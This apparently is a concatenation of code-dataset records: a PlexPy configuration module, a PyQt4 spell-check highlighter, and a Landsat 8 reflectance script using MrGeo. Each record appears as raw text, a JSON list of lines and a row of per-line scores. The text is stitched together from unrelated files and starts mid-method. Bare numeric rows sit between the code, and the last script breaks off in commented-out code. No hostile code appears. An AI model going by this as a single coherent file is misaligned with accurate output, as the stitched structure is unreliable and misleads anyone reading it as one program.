super(Config, self).__getattr__(name) else: return self.check_setting(name) def __setattr__(self, name, value): """ Maps all-caps properties to ini values unless they exist on the configuration object. 
""" if not re.match(r'[A-Z_]+$', name): super(Config, self).__setattr__(name, value) return value else: key, definition_type, section, ini_key, default = self._define(name) self._config[section][ini_key] = definition_type(value) return self._config[section][ini_key] def process_kwargs(self, kwargs): """ Given a big bunch of key value pairs, apply them to the ini. """ for name, value in kwargs.items(): key, definition_type, section, ini_key, default = self._define(name) self._config[section][ini_key] = definition_type(value)
[ "import plexpy.logger\n", "import itertools\n", "import os\n", "import re\n", "from configobj import ConfigObj\n", "\n", "\n", "def bool_int(value):\n", " \"\"\"\n", " Casts a config value into a 0 or 1\n", " \"\"\"\n", " if isinstance(value, basestring):\n", " if value.lower() in ('', '0', 'false', 'f', 'no', 'n', 'off'):\n", " value = 0\n", " return int(bool(value))\n", "\n", "\n", "\n", "_CONFIG_DEFINITIONS = {\n", " 'DATE_FORMAT': (str, 'General', 'YYYY-MM-DD'),\n", " 'GROUPING_GLOBAL_HISTORY': (int, 'PlexWatch', 0),\n", " 'GROUPING_USER_HISTORY': (int, 'PlexWatch', 0),\n", " 'GROUPING_CHARTS': (int, 'PlexWatch', 0),\n", " 'PLEXWATCH_DATABASE': (str, 'PlexWatch', ''),\n", " 'PMS_IDENTIFIER': (str, 'PMS', ''),\n", " 'PMS_IP': (str, 'PMS', '127.0.0.1'),\n", " 'PMS_IS_REMOTE': (int, 'PMS', 0),\n", " 'PMS_LOGS_FOLDER': (str, 'PMS', ''),\n", " 'PMS_PORT': (int, 'PMS', 32400),\n", " 'PMS_TOKEN': (str, 'PMS', ''),\n", " 'PMS_SSL': (int, 'General', 0),\n", " 'PMS_URL': (str, 'PMS', ''),\n", " 'PMS_USE_BIF': (int, 'PMS', 0),\n", " 'PMS_UUID': (str, 'PMS', ''),\n", " 'TIME_FORMAT': (str, 'General', 'HH:mm'),\n", " 'API_ENABLED': (int, 'General', 0),\n", " 'API_KEY': (str, 'General', ''),\n", " 'BOXCAR_ENABLED': (int, 'Boxcar', 0),\n", " 'BOXCAR_TOKEN': (str, 'Boxcar', ''),\n", " 'BOXCAR_ON_PLAY': (int, 'Boxcar', 0),\n", " 'BOXCAR_ON_STOP': (int, 'Boxcar', 0),\n", " 'BOXCAR_ON_PAUSE': (int, 'Boxcar', 0),\n", " 'BOXCAR_ON_RESUME': (int, 'Boxcar', 0),\n", " 'BOXCAR_ON_BUFFER': (int, 'Boxcar', 0),\n", " 'BOXCAR_ON_WATCHED': (int, 'Boxcar', 0),\n", " 'BUFFER_THRESHOLD': (int, 'Monitoring', 3),\n", " 'BUFFER_WAIT': (int, 'Monitoring', 900),\n", " 'CACHE_DIR': (str, 'General', ''),\n", " 'CACHE_SIZEMB': (int, 'Advanced', 32),\n", " 'CHECK_GITHUB': (int, 'General', 1),\n", " 'CHECK_GITHUB_INTERVAL': (int, 'General', 360),\n", " 'CHECK_GITHUB_ON_STARTUP': (int, 'General', 1),\n", " 'CLEANUP_FILES': (int, 'General', 0),\n", " 'CONFIG_VERSION': (str, 'General', '0'),\n", " 
'DO_NOT_OVERRIDE_GIT_BRANCH': (int, 'General', 0),\n", " 'EMAIL_ENABLED': (int, 'Email', 0),\n", " 'EMAIL_FROM': (str, 'Email', ''),\n", " 'EMAIL_TO': (str, 'Email', ''),\n", " 'EMAIL_SMTP_SERVER': (str, 'Email', ''),\n", " 'EMAIL_SMTP_USER': (str, 'Email', ''),\n", " 'EMAIL_SMTP_PASSWORD': (str, 'Email', ''),\n", " 'EMAIL_SMTP_PORT': (int, 'Email', 25),\n", " 'EMAIL_TLS': (int, 'Email', 0),\n", " 'EMAIL_ON_PLAY': (int, 'Email', 0),\n", " 'EMAIL_ON_STOP': (int, 'Email', 0),\n", " 'EMAIL_ON_PAUSE': (int, 'Email', 0),\n", " 'EMAIL_ON_RESUME': (int, 'Email', 0),\n", " 'EMAIL_ON_BUFFER': (int, 'Email', 0),\n", " 'EMAIL_ON_WATCHED': (int, 'Email', 0),\n", " 'ENABLE_HTTPS': (int, 'General', 0),\n", " 'FIRST_RUN_COMPLETE': (int, 'General', 0),\n", " 'FREEZE_DB': (int, 'General', 0),\n", " 'GIT_BRANCH': (str, 'General', 'master'),\n", " 'GIT_PATH': (str, 'General', ''),\n", " 'GIT_USER': (str, 'General', 'drzoidberg33'),\n", " 'GROWL_ENABLED': (int, 'Growl', 0),\n", " 'GROWL_HOST': (str, 'Growl', ''),\n", " 'GROWL_PASSWORD': (str, 'Growl', ''),\n", " 'GROWL_ON_PLAY': (int, 'Growl', 0),\n", " 'GROWL_ON_STOP': (int, 'Growl', 0),\n", " 'GROWL_ON_PAUSE': (int, 'Growl', 0),\n", " 'GROWL_ON_RESUME': (int, 'Growl', 0),\n", " 'GROWL_ON_BUFFER': (int, 'Growl', 0),\n", " 'GROWL_ON_WATCHED': (int, 'Growl', 0),\n", " 'HOME_LIBRARY_CARDS': (str, 'General', 'library_statistics_first'),\n", " 'HOME_STATS_LENGTH': (int, 'General', 30),\n", " 'HOME_STATS_TYPE': (int, 'General', 0),\n", " 'HOME_STATS_COUNT': (int, 'General', 5),\n", " 'HOME_STATS_CARDS': (str, 'General', 'watch_statistics, top_tv, popular_tv, top_movies, popular_movies, top_music, popular_music, top_users, top_platforms, last_watched'),\n", " 'HTTPS_CERT': (str, 'General', ''),\n", " 'HTTPS_KEY': (str, 'General', ''),\n", " 'HTTP_HOST': (str, 'General', '0.0.0.0'),\n", " 'HTTP_PASSWORD': (str, 'General', ''),\n", " 'HTTP_PORT': (int, 'General', 8181),\n", " 'HTTP_PROXY': (int, 'General', 0),\n", " 'HTTP_ROOT': (str, 
'General', '/'),\n", " 'HTTP_USERNAME': (str, 'General', ''),\n", " 'INTERFACE': (str, 'General', 'default'),\n", " 'IP_LOGGING_ENABLE': (int, 'General', 0),\n", " 'JOURNAL_MODE': (str, 'Advanced', 'wal'),\n", " 'LAUNCH_BROWSER': (int, 'General', 1),\n", " 'LOG_DIR': (str, 'General', ''),\n", " 'LOGGING_IGNORE_INTERVAL': (int, 'Monitoring', 120),\n", " 'MOVIE_NOTIFY_ENABLE': (int, 'Monitoring', 0),\n", " 'MOVIE_NOTIFY_ON_START': (int, 'Monitoring', 1),\n", " 'MOVIE_NOTIFY_ON_STOP': (int, 'Monitoring', 0),\n", " 'MOVIE_NOTIFY_ON_PAUSE': (int, 'Monitoring', 0),\n", " 'MUSIC_NOTIFY_ENABLE': (int, 'Monitoring', 0),\n", " 'MUSIC_NOTIFY_ON_START': (int, 'Monitoring', 1),\n", " 'MUSIC_NOTIFY_ON_STOP': (int, 'Monitoring', 0),\n", " 'MUSIC_NOTIFY_ON_PAUSE': (int, 'Monitoring', 0),\n", " 'MUSIC_LOGGING_ENABLE': (int, 'Monitoring', 0),\n", " 'MONITORING_INTERVAL': (int, 'Monitoring', 60),\n", " 'NMA_APIKEY': (str, 'NMA', ''),\n", " 'NMA_ENABLED': (int, 'NMA', 0),\n", " 'NMA_PRIORITY': (int, 'NMA', 0),\n", " 'NMA_ON_PLAY': (int, 'NMA', 0),\n", " 'NMA_ON_STOP': (int, 'NMA', 0),\n", " 'NMA_ON_PAUSE': (int, 'NMA', 0),\n", " 'NMA_ON_RESUME': (int, 'NMA', 0),\n", " 'NMA_ON_BUFFER': (int, 'NMA', 0),\n", " 'NMA_ON_WATCHED': (int, 'NMA', 0),\n", " 'NOTIFY_WATCHED_PERCENT': (int, 'Monitoring', 85),\n", " 'NOTIFY_ON_START_SUBJECT_TEXT': (str, 'Monitoring', 'PlexPy ({server_name})'),\n", " 'NOTIFY_ON_START_BODY_TEXT': (str, 'Monitoring', '{user} ({player}) started playing {title}.'),\n", " 'NOTIFY_ON_STOP_SUBJECT_TEXT': (str, 'Monitoring', 'PlexPy ({server_name})'),\n", " 'NOTIFY_ON_STOP_BODY_TEXT': (str, 'Monitoring', '{user} ({player}) has stopped {title}.'),\n", " 'NOTIFY_ON_PAUSE_SUBJECT_TEXT': (str, 'Monitoring', 'PlexPy ({server_name})'),\n", " 'NOTIFY_ON_PAUSE_BODY_TEXT': (str, 'Monitoring', '{user} ({player}) has paused {title}.'),\n", " 'NOTIFY_ON_RESUME_SUBJECT_TEXT': (str, 'Monitoring', 'PlexPy ({server_name})'),\n", " 'NOTIFY_ON_RESUME_BODY_TEXT': (str, 'Monitoring', '{user} 
({player}) has resumed {title}.'),\n", " 'NOTIFY_ON_BUFFER_SUBJECT_TEXT': (str, 'Monitoring', 'PlexPy ({server_name})'),\n", " 'NOTIFY_ON_BUFFER_BODY_TEXT': (str, 'Monitoring', '{user} ({player}) is buffering {title}.'),\n", " 'NOTIFY_ON_WATCHED_SUBJECT_TEXT': (str, 'Monitoring', 'PlexPy ({server_name})'),\n", " 'NOTIFY_ON_WATCHED_BODY_TEXT': (str, 'Monitoring', '{user} ({player}) has watched {title}.'),\n", " 'OSX_NOTIFY_APP': (str, 'OSX_Notify', '/Applications/PlexPy'),\n", " 'OSX_NOTIFY_ENABLED': (int, 'OSX_Notify', 0),\n", " 'OSX_NOTIFY_ON_PLAY': (int, 'OSX_Notify', 0),\n", " 'OSX_NOTIFY_ON_STOP': (int, 'OSX_Notify', 0),\n", " 'OSX_NOTIFY_ON_PAUSE': (int, 'OSX_Notify', 0),\n", " 'OSX_NOTIFY_ON_RESUME': (int, 'OSX_Notify', 0),\n", " 'OSX_NOTIFY_ON_BUFFER': (int, 'OSX_Notify', 0),\n", " 'OSX_NOTIFY_ON_WATCHED': (int, 'OSX_Notify', 0),\n", " 'PLEX_CLIENT_HOST': (str, 'Plex', ''),\n", " 'PLEX_ENABLED': (int, 'Plex', 0),\n", " 'PLEX_PASSWORD': (str, 'Plex', ''),\n", " 'PLEX_USERNAME': (str, 'Plex', ''),\n", " 'PLEX_ON_PLAY': (int, 'Plex', 0),\n", " 'PLEX_ON_STOP': (int, 'Plex', 0),\n", " 'PLEX_ON_PAUSE': (int, 'Plex', 0),\n", " 'PLEX_ON_RESUME': (int, 'Plex', 0),\n", " 'PLEX_ON_BUFFER': (int, 'Plex', 0),\n", " 'PLEX_ON_WATCHED': (int, 'Plex', 0),\n", " 'PROWL_ENABLED': (int, 'Prowl', 0),\n", " 'PROWL_KEYS': (str, 'Prowl', ''),\n", " 'PROWL_PRIORITY': (int, 'Prowl', 0),\n", " 'PROWL_ON_PLAY': (int, 'Prowl', 0),\n", " 'PROWL_ON_STOP': (int, 'Prowl', 0),\n", " 'PROWL_ON_PAUSE': (int, 'Prowl', 0),\n", " 'PROWL_ON_RESUME': (int, 'Prowl', 0),\n", " 'PROWL_ON_BUFFER': (int, 'Prowl', 0),\n", " 'PROWL_ON_WATCHED': (int, 'Prowl', 0),\n", " 'PUSHALOT_APIKEY': (str, 'Pushalot', ''),\n", " 'PUSHALOT_ENABLED': (int, 'Pushalot', 0),\n", " 'PUSHALOT_ON_PLAY': (int, 'Pushalot', 0),\n", " 'PUSHALOT_ON_STOP': (int, 'Pushalot', 0),\n", " 'PUSHALOT_ON_PAUSE': (int, 'Pushalot', 0),\n", " 'PUSHALOT_ON_RESUME': (int, 'Pushalot', 0),\n", " 'PUSHALOT_ON_BUFFER': (int, 'Pushalot', 0),\n", " 
'PUSHALOT_ON_WATCHED': (int, 'Pushalot', 0),\n", " 'PUSHBULLET_APIKEY': (str, 'PushBullet', ''),\n", " 'PUSHBULLET_DEVICEID': (str, 'PushBullet', ''),\n", " 'PUSHBULLET_CHANNEL_TAG': (str, 'PushBullet', ''),\n", " 'PUSHBULLET_ENABLED': (int, 'PushBullet', 0),\n", " 'PUSHBULLET_ON_PLAY': (int, 'PushBullet', 0),\n", " 'PUSHBULLET_ON_STOP': (int, 'PushBullet', 0),\n", " 'PUSHBULLET_ON_PAUSE': (int, 'PushBullet', 0),\n", " 'PUSHBULLET_ON_RESUME': (int, 'PushBullet', 0),\n", " 'PUSHBULLET_ON_BUFFER': (int, 'PushBullet', 0),\n", " 'PUSHBULLET_ON_WATCHED': (int, 'PushBullet', 0),\n", " 'PUSHOVER_APITOKEN': (str, 'Pushover', ''),\n", " 'PUSHOVER_ENABLED': (int, 'Pushover', 0),\n", " 'PUSHOVER_KEYS': (str, 'Pushover', ''),\n", " 'PUSHOVER_PRIORITY': (int, 'Pushover', 0),\n", " 'PUSHOVER_ON_PLAY': (int, 'Pushover', 0),\n", " 'PUSHOVER_ON_STOP': (int, 'Pushover', 0),\n", " 'PUSHOVER_ON_PAUSE': (int, 'Pushover', 0),\n", " 'PUSHOVER_ON_RESUME': (int, 'Pushover', 0),\n", " 'PUSHOVER_ON_BUFFER': (int, 'Pushover', 0),\n", " 'PUSHOVER_ON_WATCHED': (int, 'Pushover', 0),\n", " 'REFRESH_USERS_INTERVAL': (int, 'Monitoring', 12),\n", " 'REFRESH_USERS_ON_STARTUP': (int, 'Monitoring', 1),\n", " 'TV_NOTIFY_ENABLE': (int, 'Monitoring', 0),\n", " 'TV_NOTIFY_ON_START': (int, 'Monitoring', 1),\n", " 'TV_NOTIFY_ON_STOP': (int, 'Monitoring', 0),\n", " 'TV_NOTIFY_ON_PAUSE': (int, 'Monitoring', 0),\n", " 'TWITTER_ENABLED': (int, 'Twitter', 0),\n", " 'TWITTER_PASSWORD': (str, 'Twitter', ''),\n", " 'TWITTER_PREFIX': (str, 'Twitter', 'PlexPy'),\n", " 'TWITTER_USERNAME': (str, 'Twitter', ''),\n", " 'TWITTER_ON_PLAY': (int, 'Twitter', 0),\n", " 'TWITTER_ON_STOP': (int, 'Twitter', 0),\n", " 'TWITTER_ON_PAUSE': (int, 'Twitter', 0),\n", " 'TWITTER_ON_RESUME': (int, 'Twitter', 0),\n", " 'TWITTER_ON_BUFFER': (int, 'Twitter', 0),\n", " 'TWITTER_ON_WATCHED': (int, 'Twitter', 0),\n", " 'UPDATE_DB_INTERVAL': (int, 'General', 24),\n", " 'VERIFY_SSL_CERT': (bool_int, 'Advanced', 1),\n", " 'VIDEO_LOGGING_ENABLE': 
(int, 'Monitoring', 1),\n", " 'XBMC_ENABLED': (int, 'XBMC', 0),\n", " 'XBMC_HOST': (str, 'XBMC', ''),\n", " 'XBMC_PASSWORD': (str, 'XBMC', ''),\n", " 'XBMC_USERNAME': (str, 'XBMC', ''),\n", " 'XBMC_ON_PLAY': (int, 'XBMC', 0),\n", " 'XBMC_ON_STOP': (int, 'XBMC', 0),\n", " 'XBMC_ON_PAUSE': (int, 'XBMC', 0),\n", " 'XBMC_ON_RESUME': (int, 'XBMC', 0),\n", " 'XBMC_ON_BUFFER': (int, 'XBMC', 0),\n", " 'XBMC_ON_WATCHED': (int, 'XBMC', 0)\n", "}\n", "# pylint:disable=R0902\n", "# it might be nice to refactor for fewer instance variables\n", "class Config(object):\n", " \"\"\" Wraps access to particular values in a config file \"\"\"\n", "\n", " def __init__(self, config_file):\n", " \"\"\" Initialize the config with values from a file \"\"\"\n", " self._config_file = config_file\n", " self._config = ConfigObj(self._config_file, encoding='utf-8')\n", " for key in _CONFIG_DEFINITIONS.keys():\n", " self.check_setting(key)\n", "\n", " def _define(self, name):\n", " key = name.upper()\n", " ini_key = name.lower()\n", " definition = _CONFIG_DEFINITIONS[key]\n", " if len(definition) == 3:\n", " definition_type, section, default = definition\n", " else:\n", " definition_type, section, _, default = definition\n", " return key, definition_type, section, ini_key, default\n", "\n", " def check_section(self, section):\n", " \"\"\" Check if INI section exists, if not create it \"\"\"\n", " if section not in self._config:\n", " self._config[section] = {}\n", " return True\n", " else:\n", " return False\n", "\n", " def check_setting(self, key):\n", " \"\"\" Cast any value in the config to the right type or use the default \"\"\"\n", " key, definition_type, section, ini_key, default = self._define(key)\n", " self.check_section(section)\n", " try:\n", " my_val = definition_type(self._config[section][ini_key])\n", " except Exception:\n", " my_val = definition_type(default)\n", " self._config[section][ini_key] = my_val\n", " return my_val\n", "\n", " def write(self):\n", " \"\"\" Make a copy of 
the stored config and write it to the configured file \"\"\"\n", " new_config = ConfigObj(encoding=\"UTF-8\")\n", " new_config.filename = self._config_file\n", "\n", " # first copy over everything from the old config, even if it is not\n", " # correctly defined to keep from losing data\n", " for key, subkeys in self._config.items():\n", " if key not in new_config:\n", " new_config[key] = {}\n", " for subkey, value in subkeys.items():\n", " new_config[key][subkey] = value\n", "\n", " # next make sure that everything we expect to have defined is so\n", " for key in _CONFIG_DEFINITIONS.keys():\n", " key, definition_type, section, ini_key, default = self._define(key)\n", " self.check_setting(key)\n", " if section not in new_config:\n", " new_config[section] = {}\n", " new_config[section][ini_key] = self._config[section][ini_key]\n", "\n", " # Write it to file\n", " plexpy.logger.info(\"Writing configuration to file\")\n", "\n", " try:\n", " new_config.write()\n", " except IOError as e:\n", " plexpy.logger.error(\"Error writing configuration file: %s\", e)\n", "\n", " def __getattr__(self, name):\n", " \"\"\"\n", " Returns something from the ini unless it is a real property\n", " of the configuration object or is not all caps.\n", " \"\"\"\n", " if not re.match(r'[A-Z_]+$', name):\n", " return super(Config, self).__getattr__(name)\n", " else:\n", " return self.check_setting(name)\n", "\n", " def __setattr__(self, name, value):\n", " \"\"\"\n", " Maps all-caps properties to ini values unless they exist on the\n", " configuration object.\n", " \"\"\"\n", " if not re.match(r'[A-Z_]+$', name):\n", " super(Config, self).__setattr__(name, value)\n", " return value\n", " else:\n", " key, definition_type, section, ini_key, default = self._define(name)\n", " self._config[section][ini_key] = definition_type(value)\n", " return self._config[section][ini_key]\n", "\n", " def process_kwargs(self, kwargs):\n", " \"\"\"\n", " Given a big bunch of key value pairs, apply them to the 
ini.\n", " \"\"\"\n", " for name, value in kwargs.items():\n", " key, definition_type, section, ini_key, default = self._define(name)\n", " self._config[section][ini_key] = definition_type(value)" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.041666666666666664, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.005681818181818182, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012048192771084338, 0.01, 0.012195121951219513, 0.010526315789473684, 0.012048192771084338, 0.010526315789473684, 0.011904761904761904, 0.010309278350515464, 0.011904761904761904, 0.01020408163265306, 0.011764705882352941, 0.01020408163265306, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.045454545454545456, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012195121951219513, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011764705882352941, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012345679012345678, 0, 0, 0, 0, 0, 0, 0, 0, 0.012345679012345678, 0.014925373134328358 ]
320
0.000906
false
################################################################################ ### Copyright © 2012-2013 BlackDragonHunt ### ### This file is part of the Super Duper Script Editor. ### ### The Super Duper Script Editor is free software: you can redistribute it ### and/or modify it under the terms of the GNU General Public License as ### published by the Free Software Foundation, either version 3 of the License, ### or (at your option) any later version. ### ### The Super Duper Script Editor is distributed in the hope that it will be ### useful, but WITHOUT ANY WARRANTY; without even the implied warranty of ### MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the ### GNU General Public License for more details. ### ### You should have received a copy of the GNU General Public License ### along with the Super Duper Script Editor. ### If not, see <http://www.gnu.org/licenses/>. ################################################################################ from PyQt4 import QtGui, QtCore from PyQt4.QtGui import QTextCharFormat, QColor import enchant from enchant.checker import SpellChecker from enchant.tokenize import HTMLChunker import common class SpellCheckHighlighter(QtGui.QSyntaxHighlighter): def __init__(self, parent = None): super(SpellCheckHighlighter, self).__init__(parent) self.set_language("en_US") self.format = QTextCharFormat() self.format.setUnderlineColor(QColor(255, 0, 0)) self.format.setUnderlineStyle(QTextCharFormat.SpellCheckUnderline) self.errors = [] def set_language(self, lang): dict = enchant.DictWithPWL(lang, "data/dict/enchant.txt") self.checker = SpellChecker(dict, chunkers = (HTMLChunker,)) def get_language(self): return self.checker.dict.tag def highlightBlock(self, text): # If there is no previous state, then it's -1, which makes the first line 0. # And every line after that increases as expected. line = self.previousBlockState() + 1 self.setCurrentBlockState(line) # Make sure our error list is long enough to hold this line. 
for i in range(len(self.errors), line + 1): self.errors.append([]) self.errors[line] = [] self.checker.set_text(common.qt_to_unicode(text)) for err in self.checker: self.setFormat(err.wordpos, len(err.word), self.format) self.errors[line].append((err.word, err.wordpos)) def add(self, word): self.checker.add(word) self.rehighlight() def ignore(self, word): self.checker.ignore_always(word) self.rehighlight() ### EOF ###
[ "################################################################################\n", "### Copyright © 2012-2013 BlackDragonHunt\n", "### \n", "### This file is part of the Super Duper Script Editor.\n", "### \n", "### The Super Duper Script Editor is free software: you can redistribute it\n", "### and/or modify it under the terms of the GNU General Public License as\n", "### published by the Free Software Foundation, either version 3 of the License,\n", "### or (at your option) any later version.\n", "### \n", "### The Super Duper Script Editor is distributed in the hope that it will be\n", "### useful, but WITHOUT ANY WARRANTY; without even the implied warranty of\n", "### MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n", "### GNU General Public License for more details.\n", "### \n", "### You should have received a copy of the GNU General Public License\n", "### along with the Super Duper Script Editor.\n", "### If not, see <http://www.gnu.org/licenses/>.\n", "################################################################################\n", "\n", "from PyQt4 import QtGui, QtCore\n", "from PyQt4.QtGui import QTextCharFormat, QColor\n", "\n", "import enchant\n", "from enchant.checker import SpellChecker\n", "from enchant.tokenize import HTMLChunker\n", "\n", "import common\n", "\n", "class SpellCheckHighlighter(QtGui.QSyntaxHighlighter):\n", " def __init__(self, parent = None):\n", " super(SpellCheckHighlighter, self).__init__(parent)\n", " \n", " self.set_language(\"en_US\")\n", " \n", " self.format = QTextCharFormat()\n", " self.format.setUnderlineColor(QColor(255, 0, 0))\n", " self.format.setUnderlineStyle(QTextCharFormat.SpellCheckUnderline)\n", " \n", " self.errors = []\n", " \n", " def set_language(self, lang):\n", " dict = enchant.DictWithPWL(lang, \"data/dict/enchant.txt\")\n", " self.checker = SpellChecker(dict, chunkers = (HTMLChunker,))\n", " \n", " def get_language(self):\n", " return self.checker.dict.tag\n", " \n", " def 
highlightBlock(self, text):\n", " \n", " # If there is no previous state, then it's -1, which makes the first line 0.\n", " # And every line after that increases as expected.\n", " line = self.previousBlockState() + 1\n", " self.setCurrentBlockState(line)\n", " \n", " # Make sure our error list is long enough to hold this line.\n", " for i in range(len(self.errors), line + 1):\n", " self.errors.append([])\n", " \n", " self.errors[line] = []\n", " self.checker.set_text(common.qt_to_unicode(text))\n", " \n", " for err in self.checker:\n", " self.setFormat(err.wordpos, len(err.word), self.format)\n", " self.errors[line].append((err.word, err.wordpos))\n", " \n", " def add(self, word):\n", " self.checker.add(word)\n", " self.rehighlight()\n", " \n", " def ignore(self, word):\n", " self.checker.ignore_always(word)\n", " self.rehighlight()\n", "\n", "### EOF ###" ]
[ 0.012345679012345678, 0.023809523809523808, 0.2, 0.017857142857142856, 0.2, 0.013157894736842105, 0.013513513513513514, 0.0125, 0.023255813953488372, 0.2, 0.012987012987012988, 0.013333333333333334, 0.015151515151515152, 0.02040816326530612, 0.2, 0.014285714285714285, 0.021739130434782608, 0.020833333333333332, 0.012345679012345678, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.01818181818181818, 0.08108108108108109, 0, 0.2, 0, 0.2, 0, 0, 0, 0.2, 0, 0.3333333333333333, 0.03125, 0, 0.03076923076923077, 0.3333333333333333, 0.038461538461538464, 0, 0.3333333333333333, 0.029411764705882353, 0.2, 0.012345679012345678, 0, 0, 0, 0.2, 0, 0, 0.034482758620689655, 0.2, 0, 0, 0.2, 0, 0.016129032258064516, 0.017857142857142856, 0.3333333333333333, 0.043478260869565216, 0, 0, 0.3333333333333333, 0.038461538461538464, 0, 0, 0, 0.18181818181818182 ]
75
0.062506
false
# -*- coding: utf-8 -*- import json import math import os from pymrgeo import MrGeo from pymrgeo.rastermapop import RasterMapOp def toa_reflectance(image, metadata, band): scales = metadata['L1_METADATA_FILE']['RADIOMETRIC_RESCALING'] mult = scales['REFLECTANCE_MULT_BAND_' + str(band)] add = scales['REFLECTANCE_ADD_BAND_' + str(band)] print('band: ' + str(band) + ' mult: ' + str(mult) + ' add: ' + str(add)) rad = ((image * mult) + add) return rad def toa_radiance(image, metadata, band): scales = metadata['L1_METADATA_FILE']['RADIOMETRIC_RESCALING'] mult = scales['RADIANCE_MULT_BAND_' + str(band)] add = scales['RADIANCE_ADD_BAND_' + str(band)] sun_elev = metadata['L1_METADATA_FILE']['IMAGE_ATTRIBUTES']['SUN_ELEVATION'] * 0.0174533 # degrees to rad print('band: ' + str(band) + ' mult: ' + str(mult) + ' add: ' + str(add)) refl = ((image * mult) + add) / math.sin(sun_elev) return refl if __name__ == "__main__": landsat = {} # find all the landsat images root = '/data/gis-data/images/landsat8/LC80140342014187LGN00' if os.path.exists(root): for dirname, subdirs, files in os.walk(root): for name in files: pathname = os.path.join(dirname, name) base, ext = os.path.splitext(pathname) ext = ext.lower() base = base.lower() print(name) if ext == '.tif': # find the band number split = base.split('_') if len(split) != 2: raise Exception('Bad TIF filename: ' + pathname) print(split[1]) b = split[1] if b == 'bqa': landsat[b] = pathname else: # strip off the "B" band = int(b[1:]) landsat[band] = pathname pass elif ext == '.json': landsat[ext[1:]] = pathname pass if not landsat.has_key('json'): raise Exception('No JSON metadata file in ' + root) with open(landsat['json']) as metafile: metadata = json.load(metafile) mrgeo = MrGeo() # mrgeo.usedebug() mrgeo.start() bqa = mrgeo.ingest_image(landsat['bqa']) # bqa.export('/data/export/landsat-bqa.tif', singleFile=True) cloud_mask = bqa < 32768 # 0 where clouds, 1 where no clouds # cloud_mask.export('/data/export/landsat-clouds.tif', 
singleFile=True) red = cloud_mask.con(positiveRaster=mrgeo.ingest_image(landsat[4]), negativeConst=RasterMapOp.nan()) green = cloud_mask.con(positiveRaster=mrgeo.ingest_image(landsat[3]), negativeConst=RasterMapOp.nan()) blue = cloud_mask.con(positiveRaster=mrgeo.ingest_image(landsat[2]), negativeConst=RasterMapOp.nan()) # red = mrgeo.ingest_image(landsat[4]) # green = mrgeo.ingest_image(landsat[3]) # blue = mrgeo.ingest_image(landsat[2]) red.save('landsat-dn-r') # red.export('/data/export/landsat-dn-r.tif', singleFile=True) # green.export('/data/export/landsat-dn-g.tif', singleFile=True) # blue.export('/data/export/landsat-dn-b.tif', singleFile=True) rgb = red.bandcombine(green, blue) rgb.export('/data/export/landsat-rgb-dn.tif', singleFile=True) r_rad = toa_radiance(red, metadata, 4) g_rad = toa_radiance(green, metadata, 3) b_rad = toa_radiance(blue, metadata, 2) r_rad.export('/data/export/landsat-rad-r.tif', singleFile=True) g_rad.export('/data/export/landsat-rad-g.tif', singleFile=True) b_rad.export('/data/export/landsat-rad-b.tif', singleFile=True) rgb = r_rad.bandcombine(g_rad, b_rad) rgb.export('/data/export/landsat-rgb-rad.tif', singleFile=True) # compute Top of Atmosphere (TOA) Reflectance of the bands (http://landsat.usgs.gov/Landsat8_Using_Product.php) r_refl = toa_reflectance(red, metadata, 4) g_refl = toa_reflectance(green, metadata, 3) b_refl = toa_reflectance(blue, metadata, 2) # combine the bands rgb = r_refl.bandcombine(g_refl, b_refl) # rgb = rgb.convert('byte', 'fit') rgb.export('/data/export/landsat-rgb-refl.tif', singleFile=True) # ones = mrgeo.load_image("all-ones-save") # slope = ones.slope() # hundreds = mrgeo.load_image("all-hundreds") # aspect = hundreds.aspect() # slope.save("slope-test") # aspect.save("aspect-test") # print("***** Starting *****") # elevation = mrgeo.load_image("small-elevation") # elevation.export("/data/export/small-elevation", singleFile=True) # slope = small_elevation.slope() # slope.save("slope-test") # print("***** 
Finished Slope 1 *****") # # slope = small_elevation.slope("rad") # slope.save("slope-test2") # print("***** Finished Slope 2 *****") # sub1 = small_elevation - 5 # sub2 = 5 - small_elevation # # sub3 = small_elevation.clone() # sub3 -= 5 # hundreds = mrgeo.load_image("all-hundreds-save") # hundreds.export("/data/export/100-export-test", singleFile=True) # # slope = mrgeo.load_image("santiago-aster") # slope.export("/data/export/santiago-aster", singleFile=True) # hundreds.export("/data/export/hundreds-export-test", singleFile=True) # sub = hundreds + ones # # sub.export("/data/export/101-export-test", singleFile=True) # zen = 30.0 * 0.0174532925 # sun 30 deg above the horizon # sunaz = 270.0 * 0.0174532925 # sun from 270 deg (west) # # coszen = math.cos(zen) # sinzen = math.sin(zen) # # slope = elevation.slope() # aspect = elevation.aspect() # # hill = 255 * ((coszen * slope.cos()) + (sinzen * slope.sin() * (sunaz - aspect).cos())) # # 